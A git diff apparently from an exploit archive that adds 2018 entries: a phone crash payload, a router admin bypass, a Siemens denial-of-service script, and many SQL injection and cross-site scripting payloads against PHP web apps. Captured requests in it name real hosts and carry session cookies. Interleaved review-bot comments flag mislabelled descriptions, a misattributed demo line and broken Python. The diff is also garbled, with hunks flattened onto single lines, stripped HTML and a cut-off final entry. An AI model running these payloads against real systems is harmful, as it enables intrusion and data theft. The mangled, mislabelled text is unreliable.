diff --git a/exploits/android/dos/44724.txt b/exploits/android/dos/44724.txt
new file mode 100644
index 000000000..0741f1d66
--- /dev/null
+++ b/exploits/android/dos/44724.txt
@@ -0,0 +1,29 @@
+OMACP is a protocol supported by many mobile devices which allows them to receive provisioning information over the mobile network. One way to provision a device is via a WAP push SMS message containing provisioning information in WbXML.
+
+A malformed OMACP WAP push message can cause memory corruption on a Samsung S7 Edge device when processing the String Extension portion of the WbXml payload. This is due to an integer overflow in memory allocation for this string.
+
+While OMACP WAP pushes require authentication, the entire WbXml payload of a push is parsed to extract the credentials, so this bug occurs pre-authentication.
+
+To reproduce the issue:
+
+1) install the attached Android application on a different phone than the one being tested for the issue
+2) manually give the application SMS permissions in the settings screen
+3) start the app and enter the phone number on the target device
+4) press the "send wap push" button
+
+The target phone will crash:
+
+02-20 15:52:56.952 15197 15197 F DEBUG : pid: 15180, tid: 15196, name: IntentService[S >>> com.wsomacp <<<
+02-20 15:52:56.952 15197 15197 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x731a800000
+
+The WAP payload causing this problem is:
+
+690b6d0733b401506694f4c6504cf6be7224df6199a9c0ec4b76db1f6e262c457fc0553dbb50863dfce2d5c55077c3ffffffff7f777777770A0604B6B6B6B6.
+
+Code for the test app is also attached.
+
+This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most recent update on my device
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44724.zip
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44736.txt b/exploits/hardware/webapps/44736.txt
new file mode 100644
index 000000000..ae0d3dd63
--- /dev/null
+++ b/exploits/hardware/webapps/44736.txt
@@ -0,0 +1,40 @@
+# Exploit Title: SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change
+# Shodan Dork: SDT-CW3B1
+# Date: 2018-05-23
+# Exploit Author: Safak Aslan
+# Vendor Homepage: http://telesquare.co.kr/
+# Version: SKT CW3B1 sw version 1.2.0
+# Tested on: Windows
+# CVE: -
+
+# Class: Unauthorized Admin Credential Change
+# Impact: The attacker can access, change and remove admin's credential and sensitive data of the device.
+# Remotely Exploitable: Yes
+# Authentication Required: No
+
+# Vulnerability Description
+
+/admin/management.shtml --> System Management access without authentication
+
+# Using the directory of /admin/management.shtml, it is possible to access directly System Management without authentication.
+# The attacker has a right to change User ID,
+# Password for General User, User ID, and Password for Admin.
+
+# Proof-of-Concept
+
+http://targetIP/admin/management.shtml
+
+
+# Additional Info
+
+Additionally, the attacker can reach without authorization the below directories.
+/admin/upload_firmware.shtml (Router firmware and lte firmware upgrade)
+/internet/wan.shtml (WAN settings info leak)
+/index.html (Version and status info leak)
+/nas/ftpsrv.shtml (The settings of FTP)
+/wifi2g/basic.shtml (The settings of Wireless)
+/admin/status.shtml (The leak information of access point status)
+/internet/lan.shtml (The leak information of LAN settings)
+/admin/statistic.shtml (System statistics info leak)
+/serial/serial_direct.shtml (The settings of direct serial)
+/admin/upload_firmware.shtml (Router Firmware and LTE Firmware upgrade)
\ No newline at end of file
diff --git a/exploits/linux/dos/44721.py b/exploits/linux/dos/44721.py
new file mode 100755
index 000000000..0de3152b3
--- /dev/null
+++ b/exploits/linux/dos/44721.py
@@ -0,0 +1,16 @@
+ # Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service
+# Date: 2018-05-23
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://www.siemens.com/
+# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions.
+# Tested on: Kali Linux
+# CVE: CVE-2016-3963
+
+#!/usr/bin/python
+
+import socket import sys if len(sys.argv) < 2: print('Usage: ' +
+sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' +
+sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00
+00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock =
+socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload,
+(sys.argv[1], 5000000))
\ No newline at end of file
diff --git a/exploits/linux/webapps/44734.txt b/exploits/linux/webapps/44734.txt
new file mode 100644
index 000000000..65a5513bc
--- /dev/null
+++ b/exploits/linux/webapps/44734.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Honeywell Scada System - Information Disclosure
+# Date: 2018-05-23
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://www.honeywell.com
+# Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS
+# Tested on: Linux
+
+# To be written after the destination IP address /web_caps/webCapsConfig
+# the downloaded file opens with the file name. The file contains
+# critical information about the destination address
+
+https://TargetIp/web_caps/webCapsConfig
+
+# Result:
+
+"Anonymous" : false,
+ "DeviceSubClass" : "Unknown",
+ "HttpPort" : {
+ "InnerPort" : 80
+ },
+ "HttpsPort" : {
+ "InnerPort" : 443
+ },
+ "NAS_Protocol_Mask" : 100,
+ "PluginVersion" : "3.3.37.274972",
+ "TCPPort" : 37777,
+ "WebVersion" : "3.2.1.294365",
+ "deviceType" : "IPC-HFW2320R-ZS",
+ "eth0" : {
+ "IPAddress" : "36.67.33.226",
+ "IPv6Address" : "2001:250:3000:1::1:2"
\ No newline at end of file
diff --git a/exploits/php/webapps/44706.txt b/exploits/php/webapps/44706.txt
new file mode 100644
index 000000000..c6ceedbcc
--- /dev/null
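Review bot: The script body in exploits/linux/dos/44721.py is not valid Python as committed: several statements are run together on each physical line, expressions are split mid-literal across lines, and `#!/usr/bin/python` sits on line 9, where it has no effect as an interpreter line. Nothing in the header tells a reader this, and nothing points a defender at remediation for CVE-2016-3963. I would add two header comments after the `# CVE:` line: `# Status: unverified - body is line-wrapped and is not valid Python as committed` and `# Mitigation: see the vendor advisory for CVE-2016-3963 (<advisory URL - placeholder>)`.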
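Review bot: The `# Result:` sample in exploits/linux/webapps/44734.txt keeps what look like the real addresses of the device the output was captured from, `"IPAddress" : "36.67.33.226"` and `"IPv6Address" : "2001:250:3000:1::1:2"`, even though the request URL above it is already sanitised to `TargetIp`. The entry loses nothing if these become documentation-range values (constructed examples): `"IPAddress" : "192.0.2.10",` and `"IPv6Address" : "2001:db8::1"`. The sample also stops inside the `"eth0"` object, so a one-line comment such as `# (output truncated)` after it would tell readers the file is longer than shown.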
+++ b/exploits/php/webapps/44706.txt @@ -0,0 +1,42 @@ +# Exploit Title: EasyService Billing 1.0 - 'template_().php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: +https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : all of the print and preview pages have the same vulnerabilities. (template_SBilling.php, template_Receipt.php, template_SBillingPerforma.php,template_SBillingQuotation.php) + All of them use the same parameters. An attacker can use any of these. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145 + Payload : tid=3&id=145' OR NOT 3938=3938# + + Type : error-based + Demo : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145 + Payload : tid=3&id=145' AND (SELECT 7524 FROM(SELECT +COUNT(*),CONCAT(0x7162707671,(SELECT +(ELT(7524=7524,1))),0x71767a7171,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UjGj + + Type : AND/OR time-based blind + Demo : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145 + Payload : tid=3&id=145' AND SLEEP(5)-- USaG + + +==================================================== +# PoC : XSS : + + Payload : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=' +‘; \ No newline at end of file diff --git a/exploits/php/webapps/44707.txt b/exploits/php/webapps/44707.txt new file mode 100644 index 000000000..35a184761 --- /dev/null +++ b/exploits/php/webapps/44707.txt 
@@ -0,0 +1,49 @@ +# Exploit Title: EasyService Billing 1.0 - 'customer-new-s.php' SQL +Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : all of the print and preview pages have the same vulnerabilities. (template_SBilling.php, template_Receipt.php, template_SBillingPerforma.php,template_SBillingQuotation.php) + All of them use the same parameters. An attacker can use any of these. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : Payload: p1=akkus+keyney' AND 1815=1815 AND 'izgU'='izgU + + Type : error-based + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : p1=akkus+keyney' AND (SELECT 2882 FROM(SELECT +COUNT(*),CONCAT(0x7162627171,(SELECT +(ELT(2882=2882,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UFGx'='UFGx + + Type : AND/OR time-based blind + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : p1=akkus+keyney' AND SLEEP(5) AND 'TJOA'='TJOA + + Type : UNION query + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : p1=akkus+keyney' UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x4e70435a69565a6248565947566b74614e7a5969635671587073454f75726f53795477506d514567,0x717a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + + + +==================================================== +# PoC : XSS : + + Payload : 
+http://test.com/EasyServiceBilling/customer-new-s.php?p1=' +‘; \ No newline at end of file diff --git a/exploits/php/webapps/44708.txt b/exploits/php/webapps/44708.txt new file mode 100644 index 000000000..a2d11679f --- /dev/null +++ b/exploits/php/webapps/44708.txt @@ -0,0 +1,43 @@ +# Exploit Title: MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : It is actually a post request sent by the user to update. + You do not need to use post data. You can injection like +GET method. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 + Payload : add=true&id=9' RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE +0x28 END))-- YVFC + + Type : error-based + Demo : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 + Payload : add=true&id=9' AND (SELECT 3635 FROM(SELECT +COUNT(*),CONCAT(0x716a6a7671,(SELECT +(ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HEMo + + Type : AND/OR time-based blind + Demo : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 + Payload : add=true&id=9' AND SLEEP(5)-- mcFO + + +==================================================== +# PoC : XSS : + + Payload : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=' +‘; \ No newline at end of file diff --git a/exploits/php/webapps/44709.txt b/exploits/php/webapps/44709.txt new file mode 100644 index 000000000..716c9ea51 --- /dev/null +++ b/exploits/php/webapps/44709.txt 
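Review bot: The header of exploits/php/webapps/44707.txt describes a different endpoint from the one the entry covers: the title names `customer-new-s.php`, but the `# Description :` lines repeat the 44706 text about the `template_*.php` print pages, and `Parameter : id` is followed by payloads that all use `p1`. Someone using this entry to decide which script and parameter to fix or filter is pointed at the wrong place. I would change the two lines to `# Description : the p1 parameter of customer-new-s.php reaches an SQL query unsanitised` and `Parameter : p1`; the XSS section suggests the same parameter is also reflected, which the description could mention if confirmed.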
@@ -0,0 +1,72 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'download.php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux +==================================================== + +# PoC : SQLi : + +Parameter : id + +Type : boolean-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44' AND 4775=4775 AND 'yvnT'='yvnT&t=files + +Type : error-based +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44' AND (SELECT 7995 FROM(SELECT +COUNT(*),CONCAT(0x71766b7071,(SELECT +(ELT(7995=7995,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VOHb'='VOHb&t=files + +Type : AND/OR time-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44' AND SLEEP(5) AND 'GnhY'='GnhY&t=files + +Type : UNION query +Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 +Payload : id=-9508' UNION ALL SELECT +NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x6267544b5552795353544744426577526b47544d477553476d576442544152546e4a456b586c726d,0x71786b7671),NULL-- +wxis&t=files + + + +Parameter : t + +Type : boolean-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44&t=files` WHERE 6575=6575 AND 6608=6608# + +Type : error-based +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44&t=files` WHERE 5293=5293 AND (SELECT 1625 FROM(SELECT +COUNT(*),CONCAT(0x71766b7071,(SELECT +(ELT(1625=1625,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OpVv + +Type : AND/OR time-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : 
id=44&t=files` WHERE 6736=6736 AND (SELECT * FROM +(SELECT(SLEEP(5)))GjCP)-- UaZE + +==================================================== + +# PoC : XSS : + +Payload(1) : +http://test.com/MySqlBlobUploader/download.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files + +Payload(2) : +http://test.com/MySqlBlobUploader/download.php?id=44&t=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98 +; \ No newline at end of file diff --git a/exploits/php/webapps/44710.txt b/exploits/php/webapps/44710.txt new file mode 100644 index 000000000..2e96e3856 --- /dev/null +++ b/exploits/php/webapps/44710.txt 
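Review bot: In exploits/php/webapps/44709.txt the `UNION query` case under `Parameter : id` gives `http://test.com/EasyFileUploader/settings-users-edit.php?id=1` as its Demo line, while the title and every other case in the file refer to `MySqlBlobUploader/download.php`. This looks like a line carried over from another entry, so the record does not say which product and script that case was observed on. The author should either confirm the case against `download.php` and correct the Demo line, or drop the case; as written it makes the affected-component list unreliable for triage.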
@@ -0,0 +1,46 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'home-file-edit.php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=42' AND 5445=5445 AND 'xkCg'='xkCg + + Type : error-based + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=42' AND (SELECT 8740 FROM(SELECT +COUNT(*),CONCAT(0x7178717671,(SELECT +(ELT(8740=8740,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xWJA'='xWJA + + Type : AND/OR time-based blind + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=42' AND SLEEP(5) AND 'eOfO'='eOfO + + Type : UNION query + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=-4824' UNION ALL SELECT +CONCAT(0x7178717671,0x4e4448494b6a6457474572704c5a73534661474c6f6b44554a7863754d77565570654c664a634274,0x717a6b7171),NULL,NULL,NULL,NULL,NULL-- +aTGd + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files \ No newline at end of file diff --git a/exploits/php/webapps/44711.txt b/exploits/php/webapps/44711.txt new file mode 100644 index 000000000..b344a7c9b --- /dev/null +++ b/exploits/php/webapps/44711.txt 
@@ -0,0 +1,47 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=7' AND 3132=3132 AND 'erLO'='erLO + + Type : error-based + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=7' AND (SELECT 6373 FROM(SELECT +COUNT(*),CONCAT(0x71717a6b71,(SELECT +(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj + + Type : AND/OR time-based blind + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=7' AND SLEEP(5) AND 'MvuE'='MvuE + + Type : UNION query + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=-3399' UNION ALL SELECT +CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL-- +EcgK + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98 +; \ No newline at end of file diff --git a/exploits/php/webapps/44712.txt b/exploits/php/webapps/44712.txt new file mode 100644 index 000000000..409c78344 --- /dev/null +++ b/exploits/php/webapps/44712.txt 
@@ -0,0 +1,39 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=7' AND 3132=3132 AND 'erLO'='erLO + +# Type: error-based +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=7' AND (SELECT 6373 FROM(SELECT +COUNT(*),CONCAT(0x71717a6b71,(SELECT +(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj + +# Type: AND/OR time-based blind +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=7' AND SLEEP(5) AND 'MvuE'='MvuE + +# Type: UNION query +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=-3399' UNION ALL SELECT +CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL-- +EcgK \ No newline at end of file diff --git a/exploits/php/webapps/44714.txt b/exploits/php/webapps/44714.txt new file mode 100644 index 000000000..0f613f2b0 --- /dev/null +++ b/exploits/php/webapps/44714.txt 
@@ -0,0 +1,55 @@ +# Exploit Title: PHP Dashboards v4.5 - Registration Page SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871 +# Version: v4.5 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. +==================================================== + +# PoC : SQLi : + +http://test.com/php/save/user.php?mode=add + +POST /php/save/user.php?mode=add HTTP/1.1 +Host: phpdashboardv4.dataninja.biz +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://test.com/ +Content-Length: 156 +Cookie: PHPSESSID=kbnho15754hdrgf4aokv8c1a35 +Connection: keep-alive +email=test123%40gmail.com&password=test123&dashboardKey=&url= +phpdashboardv4.dataninja.biz +%2Fphp%2Fsave%2F%3Fmode%3Dcollaborate%26email%3Dtest123%40gmail.com + + + +Vulnerable Payload : + +Parameter: email (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: email=test123@gmail.com' AND 3667=3667 AND +'ksGc'='ksGc&password=test123&dashboardKey=&url= +test.com/php/save/?mode=collaborate%26email=test123@gmail.com + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: email=test123@gmail.com' AND SLEEP(5) AND +'iStK'='iStK&password=test123&dashboardKey=&url= +test.com/php/save/?mode=collaborate%26email=test123@gmail.com + + 
+==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44715.txt b/exploits/php/webapps/44715.txt new file mode 100644 index 000000000..88effd7c0 --- /dev/null +++ b/exploits/php/webapps/44715.txt 
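Review bot: The captured request in exploits/php/webapps/44714.txt is only half sanitised: the URL and `Referer` use `test.com`, but `Host: phpdashboardv4.dataninja.biz` and the `url=` body field still name what appears to be the live demo host the test was run against, and the `Cookie: PHPSESSID=` header carries a session identifier from that run. I would replace them with placeholders, `Host: test.com` and `Cookie: PHPSESSID=<session-id>`, so the entry documents the flaw without pointing at a third party's system. The same applies to 44715 (`Host: phpdashboardv5.dataninja.biz`), 44718 (`Host: dreamguys.co.in`), 44720 (`Host: 188.165.129.80`) and 44722 (`Host: www.wecodex.com`). Every captured request in this commit also includes a session cookie value.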
@@ -0,0 +1,54 @@ +# Exploit Title: PHP Dashboards 4.5 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104 +# Version: v4.5 +# Category: Webapps +# Tested on: Kali linux +# Description: +# PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC: SQLi: + +http://Target/php/save/user.php?mode=add + +POST /php/save/user.php?mode=add HTTP/1.1 +Host: phpdashboardv5.dataninja.biz +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://phpdashboardv5.dataninja.biz/ +Content-Length: 152 +Cookie: PHPSESSID=f4ducgk49cgei129vs7qfl10g7 +Connection: keep-alive +email=test2%40gmail.com&password=test123&dashboardKey=&url= +phpdashboardv5.dataninja.biz +%2Fphp%2Fsave%2F%3Fmode%3Dcollaborate%26email%3Dtest2%40gmail.com + + +# Vulnerable Payload: +# Parameter: email (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +email=test2@gmail.com' AND 6800=6800 AND +'fACB'='fACB&password=test123&dashboardKey=&url= +Target/php/save/?mode=collaborate%26email=test2@gmail.com + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: + +email=test2@gmail.com' AND SLEEP(5) AND +'zgpA'='zgpA&password=test123&dashboardKey=&url= +Target/php/save/?mode=collaborate%26email=test2@gmail.com \ No newline at end of file 
diff --git a/exploits/php/webapps/44716.txt b/exploits/php/webapps/44716.txt new file mode 100644 index 000000000..4f8716bfe --- /dev/null +++ b/exploits/php/webapps/44716.txt @@ -0,0 +1,24 @@ +# Exploit Title: Mcard - Mobile Card Selling Platform 1 - Cross-Site Request Forgery +# Date: 2018-05-23 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15 +# Version: 1 +# Tested on: Kali linux + +# POC : + + + + CSRF POC + + +
+ + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44718.txt b/exploits/php/webapps/44718.txt new file mode 100644 index 000000000..71b5d0723 --- /dev/null +++ b/exploits/php/webapps/44718.txt @@ -0,0 +1,43 @@ +# Exploit Title: Gigs v2.0 - Login Page SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/gigs-services-marketplace/20716059 +# Version: v2.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. +==================================================== + +# PoC : SQLi : + +https://test.com/thegigs/user/dashboard/is_valid_login + +POST /thegigs/user/dashboard/is_valid_login HTTP/1.1 +Host: dreamguys.co.in +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/javascript +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https://test.com/thegigs/ +Content-Length: 27 +Cookie: ci_session=33p2j7q2a35qt5vrjt1r0985pt2i0v7g +Connection: keep-alive +username=demo&password=1234 + +Vulnerable Payload : + +Parameter: username (POST) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: username=demo' AND SLEEP(5) AND 'NVll'='NVll&password=1234 + + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44719.txt b/exploits/php/webapps/44719.txt new file mode 100644 index 000000000..58b64d864 --- /dev/null +++ b/exploits/php/webapps/44719.txt 
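Review bot: The `# Description :` block in exploits/php/webapps/44718.txt opens with `PHP Dashboards is prone to an SQL-injection vulnerability`, but the entry is for Gigs v2.0; the paragraph appears to be carried over unchanged from 44714. The first line should name the product in the title, `# Description : Gigs is prone to an SQL-injection vulnerability`. The same sentence is repeated in 44719, 44720, 44722, 44725, 44726 and 44727, each of which is titled for a different product. In this file the continuation lines of the block also lack the `#` prefix that 44719 uses.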
@@ -0,0 +1,51 @@ +# Exploit Title: Online Store System CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor: Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/online-store-system-in-php-and-mysql/3 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description: PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC: SQLi: +# Demo: https://Target/demos/shop/ + +https://Target/demos/shop/index.php?action=clientaccess + +POST /demos/shop/index.php?action=clientaccess HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/shop/index.php?view=clientaccess +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: 